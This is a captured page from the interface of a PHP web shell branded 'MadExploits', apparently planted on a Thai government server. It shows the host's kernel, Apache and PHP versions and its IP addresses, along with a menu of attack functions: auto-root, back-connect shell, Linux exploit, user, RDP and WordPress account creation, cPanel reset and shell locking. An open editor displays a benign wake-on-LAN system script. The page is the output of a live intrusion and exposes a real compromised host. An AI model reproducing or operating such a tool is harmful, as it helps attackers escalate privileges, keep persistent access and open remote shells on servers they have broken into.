Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
scripts /
linux /
[ HOME SHELL ]
Name
Size
Permission
Action
hal-dockstation-undock-linux
252
B
-rwxr-xr-x
hal-luks-remove-linux
1.62
KB
-rwxr-xr-x
hal-luks-setup-linux
1.07
KB
-rwxr-xr-x
hal-luks-teardown-linux
813
B
-rwxr-xr-x
hal-system-killswitch-get-powe...
1.31
KB
-rwxr-xr-x
hal-system-killswitch-set-powe...
1.37
KB
-rwxr-xr-x
hal-system-lcd-get-brightness-...
2.3
KB
-rwxr-xr-x
hal-system-lcd-set-brightness-...
2.34
KB
-rwxr-xr-x
hal-system-power-hibernate-lin...
1.81
KB
-rwxr-xr-x
hal-system-power-reboot-linux
333
B
-rwxr-xr-x
hal-system-power-set-power-sav...
451
B
-rwxr-xr-x
hal-system-power-shutdown-linu...
335
B
-rwxr-xr-x
hal-system-power-suspend-hybri...
2.06
KB
-rwxr-xr-x
hal-system-power-suspend-linux
2.15
KB
-rwxr-xr-x
hal-system-wol-enable-linux
1.73
KB
-rwxr-xr-x
hal-system-wol-enabled-linux
1.73
KB
-rwxr-xr-x
hal-system-wol-linux
1.73
KB
-rwxr-xr-x
hal-system-wol-supported-linux
1.73
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hal-system-wol-enable-linux
#!/bin/bash # # Copyright (C) 2007 Holger Macht <holger@homac.de> # # Author: Holger Macht <holger@homac.de> # # This file is released under the GPLv2. # SUPPORT_FLAGS= IFACE="$HAL_PROP_NET_INTERFACE" wol_get_flags() { SUPPORT_FLAGS=`ethtool $IFACE | awk '/Supports Wake-on:/{if ($3 ~ /g/) print $3 }'` [ -n "$SUPPORT_FLAGS" ] && return 0 echo "org.freedesktop.Hal.Device.WakeOnLAN.NotSupported" >&2 echo "Network interface does not support Wake On LAN" >&2 exit 1 } wol_supported() { wol_get_flags [ -n "$SUPPORT_FLAGS" ] && return 0 return 1 } wol_enabled() { ENABLED=`ethtool $IFACE | awk '/[^s ]Wake-on:/{if ($2 ~ /g/) print $2 }'` [ -n "$ENABLED" ] && return 0 return 1 } wol_enable() { wol_get_flags if [ -z "$SUPPORT_FLAGS" ]; then echo "No support flags set, using default: g" SUPPORT_FLAGS=g fi ethtool -s $IFACE wol $SUPPORT_FLAGS if [ "$?" != "0" ]; then echo "error enabling wake on LAN for interface $IFACE" return 1 fi } wol_disable() { ethtool -s $IFACE wol d if [ "$?" != "0" ]; then echo "error disabling wake on LAN for interface $IFACE" return 1 fi } which ethtool >/dev/null 2>&1 if [ "$?" != "0" ]; then echo "org.freedesktop.Hal.Device.WakeOnLan.NoEthtool" >&2 echo -e "No ethtool found in \$PATH" >&2 exit 1 fi case "`basename $0`" in hal-system-wol-supported-linux) wol_supported ;; hal-system-wol-enabled-linux) wol_enabled ;; hal-system-wol-enable-linux) if [ "$enable" = "true" ]; then wol_enable elif [ "$enable" = "false" ]; then wol_disable else echo "org.freedesktop.Hal.Device.WakeOnLAN.InvalidArgument" >&2 echo "argument must be of boolean type" >&2 exit 1 fi ;; *) ;; esac exit $?
Close